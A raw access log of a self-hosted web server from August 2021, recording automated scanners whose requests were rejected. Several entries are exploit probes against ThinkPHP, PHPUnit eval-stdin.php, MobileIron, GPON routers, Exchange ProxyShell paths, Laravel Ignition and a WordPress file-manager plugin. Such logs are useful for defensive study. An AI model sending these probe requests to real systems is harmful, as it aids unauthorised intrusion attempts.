10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [24/Aug/2021:20:56:25 +0000] 400 - GET http 64.22.31.253 "/zdrtyhmcfghn" [Client 193.46.254.155] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [24/Aug/2021:21:21:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 167.248.133.60] [Length 0] [Gzip -] "-" "-" [24/Aug/2021:21:21:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "-" "-" [24/Aug/2021:21:21:53 +0000] 400 - GET http 64.22.31.253 "/" [Client 167.248.133.60] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [24/Aug/2021:22:14:40 +0000] 444 - POST https 192.168.0.1 "/GponForm/diag_Form?style/" [Client 185.222.59.20] [Length 0] [Gzip -] "curl/7.3.2" "-" [24/Aug/2021:22:34:10 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [24/Aug/2021:22:35:04 +0000] 444 - GET https 64.22.31.253 "/ReportServer" [Client 192.241.217.208] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:22:37:22 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.141.34] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [24/Aug/2021:22:45:23 +0000] 444 - GET https 64.22.31.253 "/login" [Client 192.241.202.222] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:23:15:47 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.201.100] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [24/Aug/2021:23:51:23 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Aug/2021:00:03:35 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:35 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:37 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [25/Aug/2021:00:03:39 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:40 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:40 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:43 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:44 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:45 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:46 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:03:46 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:00:37:01 +0000] 444 - GET https oauth.moralanimal.net "/.git/config" [Client 199.195.252.18] [Length 0] [Gzip -] "Go-http-client/1.1" "-" [25/Aug/2021:00:58:55 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.195] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:01:37:11 +0000] 444 - GET https 64.22.31.253 "/" [Client 74.120.14.42] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:01:37:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.42] [Length 252] [Gzip -] "-" "-" [25/Aug/2021:01:37:12 +0000] 400 - GET http 64.22.31.253 "/" [Client 74.120.14.42] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [25/Aug/2021:03:59:57 +0000] 400 - GET http 64.22.31.253 "/zdrtyhmcfghn" [Client 193.46.254.155] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [25/Aug/2021:04:01:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.202.246] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Aug/2021:05:29:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.134.170] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Aug/2021:05:32:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.106.29.210] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:90.0) Gecko/20100101 Firefox/90.0" "-" [25/Aug/2021:05:43:00 +0000] 400 - GET http localhost "/" [Client 185.189.182.234] [Length 154] [Gzip -] "-" "-" [25/Aug/2021:08:34:12 +0000] 444 - GET https 64.22.31.253 "/" [Client 162.142.125.59] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:08:34:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "-" "-" [25/Aug/2021:08:34:14 +0000] 400 - GET http 64.22.31.253 "/" [Client 162.142.125.59] [Length 252] [Gzip -] "Mozilla/5.0 (compatible; CensysInspect/1.1; +https://about.censys.io/)" "-" [25/Aug/2021:09:47:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 138.68.128.9] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "-" [25/Aug/2021:10:26:20 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx?url=https%3a%2f%2f1%2fecp%2f" [Client 192.241.219.194] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Aug/2021:13:07:52 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [25/Aug/2021:13:56:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Aug/2021:15:22:36 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 204.236.147.54] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_5) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/50.0.2661.102 Safari/537.36" "-" [25/Aug/2021:16:08:49 +0000] 444 - GET https 64.22.31.253 "/" [Client 138.68.128.9] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/68.0.3440.106 Safari/537.36" "-" [25/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/ui/" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Aug/2021:17:01:25 +0000] 444 - GET https 192.168.1.12 "/favicon.ico" [Client 192.168.1.2] [Length 0] [Gzip -] "Mozilla / 5.0(Windows NT 10.0; &) Gecko / 20100101 Firefox / 62.0" "-" [25/Aug/2021:17:02:41 +0000] 444 - GET https 64.22.31.253 "/owa/" [Client 128.14.133.58] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Aug/2021:17:03:01 +0000] 444 - GET https 64.22.31.253 "/owa/auth/x.js" [Client 192.241.204.129] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Aug/2021:17:15:50 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.199.103] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Aug/2021:17:27:48 +0000] 444 - GET https 64.22.31.253 "/owa/auth/logon.aspx" [Client 192.241.220.186] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Aug/2021:19:41:55 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Aug/2021:19:56:09 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.202] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Aug/2021:20:13:31 +0000] 444 - GET https 64.22.31.253 "/actuator/health" [Client 192.241.221.145] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Aug/2021:20:24:59 +0000] 400 - - https localhost "-" [Client 195.78.54.251] [Length 154] [Gzip -] "-" "-" [25/Aug/2021:20:33:20 +0000] 444 - GET https 64.22.31.253 "/" [Client 198.20.69.98] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [25/Aug/2021:20:33:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 198.20.69.98] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [25/Aug/2021:20:33:21 +0000] 444 - GET https 64.22.31.253 "/" [Client 198.20.69.98] [Length 0] [Gzip -] "Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.137 Safari/537.36" "-" [25/Aug/2021:20:34:04 +0000] 400 - - https localhost "-" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:20:34:04 +0000] 400 - - https localhost "-" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:20:34:05 +0000] 400 - - https localhost "-" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:20:34:10 +0000] 444 - GET https 64.22.31.253 "/robots.txt" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:20:34:10 +0000] 444 - GET https 64.22.31.253 "/sitemap.xml" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:20:34:10 +0000] 444 - GET https 64.22.31.253 "/.well-known/security.txt" [Client 198.20.69.98] [Length 0] [Gzip -] "-" "-" [25/Aug/2021:20:34:15 +0000] 444 - GET https 64.22.31.253 "/" [Client 34.79.68.246] [Length 0] [Gzip -] "python-requests/2.26.0" "-" [25/Aug/2021:20:42:32 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:32 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:33 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:33 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:35 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [25/Aug/2021:20:42:35 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:36 +0000] 444 - GET https 64.22.31.253 "/console/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:37 +0000] 444 - POST https 64.22.31.253 "/Autodiscover/Autodiscover.xml" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:37 +0000] 444 - GET https 64.22.31.253 "/_ignition/execute-solution" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:38 +0000] 444 - GET https 64.22.31.253 "/" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:42:39 +0000] 444 - GET https 64.22.31.253 "/?XDEBUG_SESSION_START=phpstorm" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [25/Aug/2021:20:54:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 5.189.160.161] [Length 0] [Gzip -] "libwww-perl/6.05" "-" [25/Aug/2021:21:32:21 +0000] 400 - GET http 64.22.31.253 "/config/getuser?index=0" [Client 209.141.51.176] [Length 252] [Gzip -] "Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:76.0) Gecko/20100101 Firefox/76.0" "-" [25/Aug/2021:21:34:50 +0000] 444 - GET https 64.22.31.253 "/" [Client 183.136.225.14] [Length 0] [Gzip -] "Mozilla/5.0 (Macintosh; Intel Mac OS X 10.11; rv:47.0) Gecko/20100101 Firefox/47.0" "-" [25/Aug/2021:22:11:45 +0000] 444 - GET https 64.22.31.253 "/solr/" [Client 162.221.192.26] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [25/Aug/2021:23:14:29 +0000] 444 - GET https 64.22.31.253 "/ecp/Current/exporttool/microsoft.exchange.ediscovery.exporttool.application" [Client 192.241.206.198] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [25/Aug/2021:23:56:35 +0000] 444 - GET https 64.22.31.253 "/" [Client 143.198.39.198] [Length 0] [Gzip -] "Mozilla/5.0 (Linux; Android 6.0; vivo 1713 Build/MRA58K) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/53.0.2785.124 Mobile Safari/537.36" "-" [26/Aug/2021:00:49:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.46.254.155] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.90 Safari/537.36" "-" [26/Aug/2021:00:51:26 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:00:51:27 +0000] 444 - GET https trilium.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:01:14:00 +0000] 444 - GET https 64.22.31.253 "/" [Client 184.105.247.195] [Length 0] [Gzip -] "-" "-" [26/Aug/2021:02:13:41 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:02:13:41 +0000] 444 - GET https guacamole.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:02:54:30 +0000] 444 - GET https 64.22.31.253 "/" [Client 66.94.121.135] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:04:04:36 +0000] 444 - GET https 64.22.31.253 "/" [Client 192.241.220.47] [Length 0] [Gzip -] "Mozilla/5.0 zgrab/0.x" "-" [26/Aug/2021:04:22:37 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:04:22:38 +0000] 444 - GET https opds.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:04:30:17 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:04:30:17 +0000] 444 - GET https traefik.moralanimal.net "/robots.txt" [Client 138.246.253.24] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/88.0.4324.146 Safari/537.36" "-" [26/Aug/2021:05:29:38 +0000] 400 - - http localhost "-" [Client 172.104.131.24] [Length 154] [Gzip -] "-" "-" [26/Aug/2021:06:04:01 +0000] 444 - GET https 64.22.31.253 "/" [Client 193.118.53.194] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36" "-" [26/Aug/2021:07:04:58 +0000] 444 - GET https 64.22.31.253 "/" [Client 212.41.22.75] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.25" "-" [26/Aug/2021:07:10:31 +0000] 400 - HEAD http localhost "/" [Client 68.183.91.133] [Length 0] [Gzip -] "-" "-" [26/Aug/2021:07:10:31 +0000] 400 - GET http 64.22.31.253 "/system_api.php" [Client 68.183.91.133] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:32 +0000] 444 - GET https 64.22.31.253 "/system_api.php" [Client 68.183.91.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:32 +0000] 400 - GET http 64.22.31.253 "/c/version.js" [Client 68.183.91.133] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:33 +0000] 444 - GET https 64.22.31.253 "/c/version.js" [Client 68.183.91.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:34 +0000] 400 - GET http 64.22.31.253 "/streaming/clients_live.php" [Client 68.183.91.133] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:34 +0000] 444 - GET https 64.22.31.253 "/streaming/clients_live.php" [Client 68.183.91.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:35 +0000] 400 - GET http 64.22.31.253 "/stalker_portal/c/version.js" [Client 68.183.91.133] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:36 +0000] 444 - GET https 64.22.31.253 "/stalker_portal/c/version.js" [Client 68.183.91.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:36 +0000] 400 - GET http 64.22.31.253 "/stream/live.php" [Client 68.183.91.133] [Length 252] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [26/Aug/2021:07:10:37 +0000] 444 - GET https 64.22.31.253 "/stream/live.php" [Client 68.183.91.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Spotify / 1.1.39.612 Safari / 537.36" "-" [26/Aug/2021:07:10:37 +0000] 400 - GET http 64.22.31.253 "/flu/403.html" [Client 68.183.91.133] [Length 654] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:07:10:38 +0000] 444 - GET https 64.22.31.253 "/flu/403.html" [Client 68.183.91.133] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36" "-" [26/Aug/2021:08:31:33 +0000] 444 - POST https 64.22.31.253 "/api/jsonws/invoke" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:33 +0000] 444 - POST https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:36 +0000] 444 - GET https 64.22.31.253 "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:36 +0000] 444 - GET https 64.22.31.253 "/index.php?s=/Index/\x5Cthink\x5Capp/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=HelloThinkPHP21" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" [26/Aug/2021:08:31:37 +0000] 444 - POST https 64.22.31.253 "/mifs/.;/services/LogService" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "https://64.22.31.253:443" [26/Aug/2021:08:31:37 +0000] 444 - GET https 64.22.31.253 "/wp-content/plugins/wp-file-manager/readme.txt" [Client 45.146.164.110] [Length 0] [Gzip -] "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/78.0.3904.108 Safari/537.36" "-" 